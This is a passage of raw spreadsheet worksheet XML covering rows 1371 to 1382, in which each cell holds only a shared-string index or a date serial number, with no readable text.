      <c r="W1371" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1371" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1371" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1371" s="24">
        <v>46000.6856597222</v>
      </c>
      <c r="AA1371" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1371" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1371" s="23"/>
      <c r="AD1371" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1371" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1371" s="23"/>
      <c r="AG1371" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1371" s="24">
        <v>46000.6856944444</v>
      </c>
      <c r="AI1371" s="23"/>
      <c r="AJ1371" s="23"/>
      <c r="AK1371" s="23"/>
      <c r="AL1371" s="23"/>
      <c r="AM1371" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1371" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1371" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1371" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1371" s="24">
        <v>46000.7064930556</v>
      </c>
      <c r="AR1371" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1371" s="23"/>
      <c r="AT1371" s="23"/>
      <c r="AU1371" s="23"/>
    </row>
    <row r="1372" s="1" customFormat="1" spans="1:47">
      <c r="A1372" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1372" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1372" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1372" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1372" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1372" s="23" t="s">
        <v>10786</v>
      </c>
      <c r="G1372" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1372" s="23"/>
      <c r="I1372" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1372" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1372" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1372" s="24">
        <v>46000.6794328704</v>
      </c>
      <c r="M1372" s="24">
        <v>46000.6794328704</v>
      </c>
      <c r="N1372" s="23" t="s">
        <v>9116</v>
      </c>
      <c r="O1372" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1372" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1372" s="23"/>
      <c r="R1372" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1372" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1372" s="23"/>
      <c r="U1372" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1372" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1372" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1372" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1372" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1372" s="24">
        <v>46000.6804513889</v>
      </c>
      <c r="AA1372" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1372" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1372" s="23"/>
      <c r="AD1372" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1372" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1372" s="23"/>
      <c r="AG1372" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1372" s="24">
        <v>46000.680474537</v>
      </c>
      <c r="AI1372" s="23"/>
      <c r="AJ1372" s="23"/>
      <c r="AK1372" s="23"/>
      <c r="AL1372" s="23"/>
      <c r="AM1372" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1372" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1372" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1372" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1372" s="24">
        <v>46000.7012847222</v>
      </c>
      <c r="AR1372" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1372" s="23"/>
      <c r="AT1372" s="23"/>
      <c r="AU1372" s="23"/>
    </row>
    <row r="1373" s="1" customFormat="1" spans="1:47">
      <c r="A1373" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1373" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1373" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1373" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1373" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1373" s="23" t="s">
        <v>10787</v>
      </c>
      <c r="G1373" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1373" s="23"/>
      <c r="I1373" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1373" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1373" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1373" s="24">
        <v>46000.6677777778</v>
      </c>
      <c r="M1373" s="24">
        <v>46000.6677777778</v>
      </c>
      <c r="N1373" s="23" t="s">
        <v>8805</v>
      </c>
      <c r="O1373" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1373" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1373" s="23"/>
      <c r="R1373" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1373" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1373" s="23"/>
      <c r="U1373" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1373" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1373" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1373" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1373" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1373" s="24">
        <v>46000.6687152778</v>
      </c>
      <c r="AA1373" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1373" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1373" s="23"/>
      <c r="AD1373" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1373" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1373" s="23"/>
      <c r="AG1373" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1373" s="24">
        <v>46000.6687384259</v>
      </c>
      <c r="AI1373" s="23"/>
      <c r="AJ1373" s="23"/>
      <c r="AK1373" s="23"/>
      <c r="AL1373" s="23"/>
      <c r="AM1373" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1373" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1373" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1373" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1373" s="24">
        <v>46000.6895486111</v>
      </c>
      <c r="AR1373" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1373" s="23"/>
      <c r="AT1373" s="23"/>
      <c r="AU1373" s="23"/>
    </row>
    <row r="1374" s="1" customFormat="1" spans="1:47">
      <c r="A1374" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1374" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1374" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1374" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1374" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1374" s="23" t="s">
        <v>10788</v>
      </c>
      <c r="G1374" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1374" s="23"/>
      <c r="I1374" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1374" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1374" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1374" s="24">
        <v>46000.664525463</v>
      </c>
      <c r="M1374" s="24">
        <v>46000.664525463</v>
      </c>
      <c r="N1374" s="23" t="s">
        <v>10628</v>
      </c>
      <c r="O1374" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1374" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1374" s="23"/>
      <c r="R1374" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1374" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1374" s="23"/>
      <c r="U1374" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1374" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1374" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1374" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1374" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1374" s="24">
        <v>46000.6653935185</v>
      </c>
      <c r="AA1374" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1374" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1374" s="23"/>
      <c r="AD1374" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1374" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1374" s="23"/>
      <c r="AG1374" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1374" s="24">
        <v>46000.6654166667</v>
      </c>
      <c r="AI1374" s="23"/>
      <c r="AJ1374" s="23"/>
      <c r="AK1374" s="23"/>
      <c r="AL1374" s="23"/>
      <c r="AM1374" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1374" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1374" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1374" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1374" s="24">
        <v>46000.6862268519</v>
      </c>
      <c r="AR1374" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1374" s="23"/>
      <c r="AT1374" s="23"/>
      <c r="AU1374" s="23"/>
    </row>
    <row r="1375" s="1" customFormat="1" spans="1:47">
      <c r="A1375" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1375" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1375" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1375" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1375" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1375" s="23" t="s">
        <v>10789</v>
      </c>
      <c r="G1375" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1375" s="23"/>
      <c r="I1375" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1375" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1375" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1375" s="24">
        <v>46000.6346527778</v>
      </c>
      <c r="M1375" s="24">
        <v>46000.6346527778</v>
      </c>
      <c r="N1375" s="23" t="s">
        <v>9116</v>
      </c>
      <c r="O1375" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1375" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1375" s="23"/>
      <c r="R1375" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="S1375" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1375" s="23"/>
      <c r="U1375" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1375" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1375" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1375" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1375" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1375" s="24">
        <v>46000.6353703704</v>
      </c>
      <c r="AA1375" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1375" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1375" s="23"/>
      <c r="AD1375" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1375" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1375" s="23"/>
      <c r="AG1375" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1375" s="24">
        <v>46000.6354050926</v>
      </c>
      <c r="AI1375" s="23"/>
      <c r="AJ1375" s="23"/>
      <c r="AK1375" s="23"/>
      <c r="AL1375" s="23"/>
      <c r="AM1375" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1375" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1375" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1375" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1375" s="24">
        <v>46000.6562037037</v>
      </c>
      <c r="AR1375" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1375" s="23"/>
      <c r="AT1375" s="23"/>
      <c r="AU1375" s="23"/>
    </row>
    <row r="1376" s="1" customFormat="1" spans="1:47">
      <c r="A1376" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1376" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1376" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1376" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1376" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1376" s="23" t="s">
        <v>10790</v>
      </c>
      <c r="G1376" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1376" s="23"/>
      <c r="I1376" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1376" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1376" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1376" s="24">
        <v>46000.6336805556</v>
      </c>
      <c r="M1376" s="24">
        <v>46000.6336805556</v>
      </c>
      <c r="N1376" s="23" t="s">
        <v>10628</v>
      </c>
      <c r="O1376" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1376" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1376" s="23"/>
      <c r="R1376" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="S1376" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1376" s="23"/>
      <c r="U1376" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1376" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1376" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1376" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1376" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1376" s="24">
        <v>46000.6344560185</v>
      </c>
      <c r="AA1376" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1376" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1376" s="23"/>
      <c r="AD1376" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1376" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1376" s="23"/>
      <c r="AG1376" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1376" s="24">
        <v>46000.6344791667</v>
      </c>
      <c r="AI1376" s="23"/>
      <c r="AJ1376" s="23"/>
      <c r="AK1376" s="23"/>
      <c r="AL1376" s="23"/>
      <c r="AM1376" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1376" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1376" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1376" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1376" s="24">
        <v>46000.6552893519</v>
      </c>
      <c r="AR1376" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1376" s="23"/>
      <c r="AT1376" s="23"/>
      <c r="AU1376" s="23"/>
    </row>
    <row r="1377" s="1" customFormat="1" spans="1:47">
      <c r="A1377" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1377" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1377" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1377" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1377" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1377" s="23" t="s">
        <v>10791</v>
      </c>
      <c r="G1377" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1377" s="23"/>
      <c r="I1377" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1377" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1377" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1377" s="24">
        <v>46000.5557407407</v>
      </c>
      <c r="M1377" s="24">
        <v>46000.5557407407</v>
      </c>
      <c r="N1377" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1377" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1377" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1377" s="23"/>
      <c r="R1377" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S1377" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1377" s="23"/>
      <c r="U1377" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1377" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1377" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1377" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1377" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1377" s="24">
        <v>46000.5565509259</v>
      </c>
      <c r="AA1377" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1377" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1377" s="23"/>
      <c r="AD1377" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1377" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1377" s="23"/>
      <c r="AG1377" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1377" s="24">
        <v>46000.5565740741</v>
      </c>
      <c r="AI1377" s="23"/>
      <c r="AJ1377" s="23"/>
      <c r="AK1377" s="23"/>
      <c r="AL1377" s="23"/>
      <c r="AM1377" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1377" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1377" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1377" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1377" s="24">
        <v>46000.5773842593</v>
      </c>
      <c r="AR1377" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1377" s="23"/>
      <c r="AT1377" s="23"/>
      <c r="AU1377" s="23"/>
    </row>
    <row r="1378" s="1" customFormat="1" spans="1:47">
      <c r="A1378" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1378" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1378" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1378" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1378" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1378" s="23" t="s">
        <v>10792</v>
      </c>
      <c r="G1378" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1378" s="23"/>
      <c r="I1378" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1378" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1378" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1378" s="24">
        <v>46000.4004282407</v>
      </c>
      <c r="M1378" s="24">
        <v>46000.4004282407</v>
      </c>
      <c r="N1378" s="23" t="s">
        <v>10628</v>
      </c>
      <c r="O1378" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1378" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1378" s="23"/>
      <c r="R1378" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1378" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1378" s="23"/>
      <c r="U1378" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1378" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1378" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1378" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1378" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1378" s="24">
        <v>46000.4008680556</v>
      </c>
      <c r="AA1378" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1378" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1378" s="23"/>
      <c r="AD1378" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1378" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1378" s="23"/>
      <c r="AG1378" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1378" s="24">
        <v>46000.4009027778</v>
      </c>
      <c r="AI1378" s="23"/>
      <c r="AJ1378" s="23"/>
      <c r="AK1378" s="23"/>
      <c r="AL1378" s="23"/>
      <c r="AM1378" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1378" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1378" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1378" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1378" s="24">
        <v>46000.4217013889</v>
      </c>
      <c r="AR1378" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1378" s="23"/>
      <c r="AT1378" s="23"/>
      <c r="AU1378" s="23"/>
    </row>
    <row r="1379" s="1" customFormat="1" spans="1:47">
      <c r="A1379" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1379" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1379" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1379" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1379" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1379" s="23" t="s">
        <v>10793</v>
      </c>
      <c r="G1379" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1379" s="23"/>
      <c r="I1379" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1379" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1379" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1379" s="24">
        <v>46000.3798958333</v>
      </c>
      <c r="M1379" s="24">
        <v>46000.3798958333</v>
      </c>
      <c r="N1379" s="23" t="s">
        <v>9116</v>
      </c>
      <c r="O1379" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1379" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1379" s="23"/>
      <c r="R1379" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1379" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1379" s="23"/>
      <c r="U1379" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1379" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1379" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1379" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1379" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1379" s="24">
        <v>46000.380462963</v>
      </c>
      <c r="AA1379" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1379" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1379" s="23"/>
      <c r="AD1379" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1379" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1379" s="23"/>
      <c r="AG1379" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1379" s="24">
        <v>46000.3804861111</v>
      </c>
      <c r="AI1379" s="23"/>
      <c r="AJ1379" s="23"/>
      <c r="AK1379" s="23"/>
      <c r="AL1379" s="23"/>
      <c r="AM1379" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1379" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1379" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1379" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1379" s="24">
        <v>46000.4012962963</v>
      </c>
      <c r="AR1379" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1379" s="23"/>
      <c r="AT1379" s="23"/>
      <c r="AU1379" s="23"/>
    </row>
    <row r="1380" s="1" customFormat="1" spans="1:47">
      <c r="A1380" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1380" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1380" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1380" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1380" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1380" s="23" t="s">
        <v>10794</v>
      </c>
      <c r="G1380" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1380" s="23"/>
      <c r="I1380" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1380" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1380" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1380" s="24">
        <v>46000.3730787037</v>
      </c>
      <c r="M1380" s="24">
        <v>46000.3730787037</v>
      </c>
      <c r="N1380" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1380" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1380" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1380" s="23"/>
      <c r="R1380" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1380" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1380" s="23"/>
      <c r="U1380" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1380" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1380" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1380" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1380" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1380" s="24">
        <v>46000.3734722222</v>
      </c>
      <c r="AA1380" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1380" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1380" s="23"/>
      <c r="AD1380" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1380" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1380" s="23"/>
      <c r="AG1380" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1380" s="24">
        <v>46000.3734953704</v>
      </c>
      <c r="AI1380" s="23"/>
      <c r="AJ1380" s="23"/>
      <c r="AK1380" s="23"/>
      <c r="AL1380" s="23"/>
      <c r="AM1380" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1380" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1380" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1380" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1380" s="24">
        <v>46000.3943055556</v>
      </c>
      <c r="AR1380" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1380" s="23"/>
      <c r="AT1380" s="23"/>
      <c r="AU1380" s="23"/>
    </row>
    <row r="1381" s="1" customFormat="1" spans="1:47">
      <c r="A1381" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1381" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1381" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1381" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1381" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1381" s="23" t="s">
        <v>10795</v>
      </c>
      <c r="G1381" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1381" s="23"/>
      <c r="I1381" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1381" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1381" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1381" s="24">
        <v>46000.362662037</v>
      </c>
      <c r="M1381" s="24">
        <v>46000.362662037</v>
      </c>
      <c r="N1381" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1381" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1381" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1381" s="23"/>
      <c r="R1381" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1381" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1381" s="23"/>
      <c r="U1381" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1381" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1381" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1381" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1381" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1381" s="24">
        <v>46000.3635069444</v>
      </c>
      <c r="AA1381" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1381" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1381" s="23"/>
      <c r="AD1381" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1381" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1381" s="23"/>
      <c r="AG1381" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1381" s="24">
        <v>46000.3635300926</v>
      </c>
      <c r="AI1381" s="23"/>
      <c r="AJ1381" s="23"/>
      <c r="AK1381" s="23"/>
      <c r="AL1381" s="23"/>
      <c r="AM1381" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1381" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1381" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1381" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1381" s="24">
        <v>46000.3843402778</v>
      </c>
      <c r="AR1381" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1381" s="23"/>
      <c r="AT1381" s="23"/>
      <c r="AU1381" s="23"/>
    </row>
    <row r="1382" s="1" customFormat="1" spans="1:47">
      <c r="A1382" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1382" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1382" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1382" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1382" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1382" s="23" t="s">
